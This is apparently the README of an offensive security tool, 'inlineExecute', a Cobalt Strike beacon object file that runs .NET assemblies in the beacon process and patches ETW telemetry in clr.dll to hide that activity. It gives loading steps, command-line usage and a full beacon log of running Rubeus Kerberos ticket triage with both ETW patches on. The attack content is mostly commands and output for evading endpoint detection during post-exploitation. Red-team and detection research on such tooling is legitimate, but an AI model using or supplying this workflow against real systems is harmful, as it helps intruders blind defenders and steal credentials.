inlineExecute is a Cobalt Strike BOF that executes a .NET assembly in the current process, rather than spawning a sacrificial process as execute-assembly does.
It stands as a POC, and as a boilerplate for experimenting with novel techniques in the future.
Currently, it implements a novel ETW bypass technique, Provider Handle Patching. It is documented in my blog post, A Stealthier Reflective Loading.
The Provider Handle Patching technique prevents ETW telemetry from being generated by the userland hooks in clr.dll.
Unlike traditional ETW patching techniques, it does not modify memory protections and does not require suspicious WinAPIs such as WriteProcessMemory, NtWriteVirtualMemory, VirtualProtect or NtProtectVirtualMemory.
Load `inlineExecute.cna` from Cobalt Strike -> Script Manager -> Load. Ensure that `inlineExecute.o` and `inlineExecute.cna` are in the same directory.

```
beacon> inlineExecute
[+] Usage: inlineExecute [-etwH] [-etwB] [-verbose] <filepath> <args>
```

The `-etwH` and `-etwB` flags patch ETW via the Provider Handle Patching and Subscriber Bit Patching techniques, respectively. They can be used together or individually.
```
inlineExecute -etwH -etwB /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
```
The `-verbose` flag outputs debugging information.

```
inlineExecute -verbose -etwB /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
```

Example usage with `Rubeus.exe triage`:
```
[12/02 22:26:17] beacon> inlineExecute -etwB -etwH -verbose /home/kali/Ghostpack-CompiledBinaries/Rubeus.exe triage
[12/02 22:26:17] [+] Executing: /home/kali/Ghostpack-CompiledBinaries/Rubeus.exe
[12/02 22:26:17] [+] Arguments: triage
[12/02 22:26:17] [+] host called home, sent: 461058 bytes
[12/02 22:26:17] [+] received output:
[+] Runtime info obtained
[12/02 22:26:17] [+] received output:
[+] Runtime is loadable
[12/02 22:26:17] [+] received output:
[+] ICorRuntimeHost obtained
[12/02 22:26:17] [+] received output:
[+] CLR started successfully
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle address: 00007FFEA4140930
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle value: 7310c0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle patched: 1
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits address: 00007FFEA41311C0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits value: ffffffff
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits patched: 0
[12/02 22:26:17] [+] received output:
[+] clr.dll loaded: 00007FFEA36A0000
[12/02 22:26:17] [+] received output:
[+] Anonymous pipe created
[12/02 22:26:17] [+] received output:
[+] Console created and hidden
[12/02 22:26:17] [+] received output:
[+] Redirected stdout/stderr to pipe
[12/02 22:26:17] [+] received output:
[+] AppDomain Created
[12/02 22:26:17] [+] received output:
[+] Assembly Loaded
[12/02 22:26:17] [+] received output:
[+] Assembly executed, reading output...
[12/02 22:26:17] [+] received output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x1e563

 ---------------------------------------
 | LUID | UserName | Service | EndTime |
 ---------------------------------------
 ---------------------------------------

[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeHandle value restored: 7310c0
[12/02 22:26:17] [+] received output:
[+] DotNETRuntimeEnableBits value restored: ffffffff
[12/02 22:26:17] [+] received output:
[+] Done
```